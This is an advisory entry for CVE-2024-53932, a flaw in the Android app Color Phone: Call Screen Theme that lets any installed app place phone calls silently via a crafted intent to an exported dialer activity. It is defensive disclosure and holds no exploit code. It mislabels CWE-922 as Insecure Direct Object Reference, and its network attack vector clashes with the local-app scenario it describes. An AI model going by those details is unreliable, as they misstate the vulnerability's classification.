CVE-2024-53932
Published: 06 January 2025
Description
The com.remi.colorphone.callscreen.calltheme.callerscreen (aka Color Phone: Call Screen Theme) application through 21.1.9 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.remi.colorphone.callscreen.calltheme.callerscreen.dialer.DialerActivity component.
Security Summary
CVE-2024-53932 is a critical vulnerability in the Color Phone: Call Screen Theme Android application (package name com.remi.colorphone.callscreen.calltheme.callerscreen) through version 21.1.9. The issue stems from the com.remi.colorphone.callscreen.calltheme.callerscreen.dialer.DialerActivity component, which permits any other application—without needing special permissions—to silently initiate phone calls by sending a crafted intent. This flaw is linked to CWE-732 (Incorrect Permission Assignment for Critical Resource) and CWE-922 (Insecure Direct Object Reference).
The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical), with attack vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, indicating it is exploitable over the network with low complexity, no privileges, and no user interaction required. Any malicious application installed on the device can trigger it, allowing attackers to place arbitrary phone calls without the user's knowledge or consent, potentially enabling fraud, harassment, or premium-rate call scams that incur financial costs.
Advisories and further details, including potential mitigation guidance, are available at https://github.com/actuator/com.remi.colorphone.callscreen.calltheme.callerscreen/blob/main/CVE-2024-53932.
Details
- CWE(s)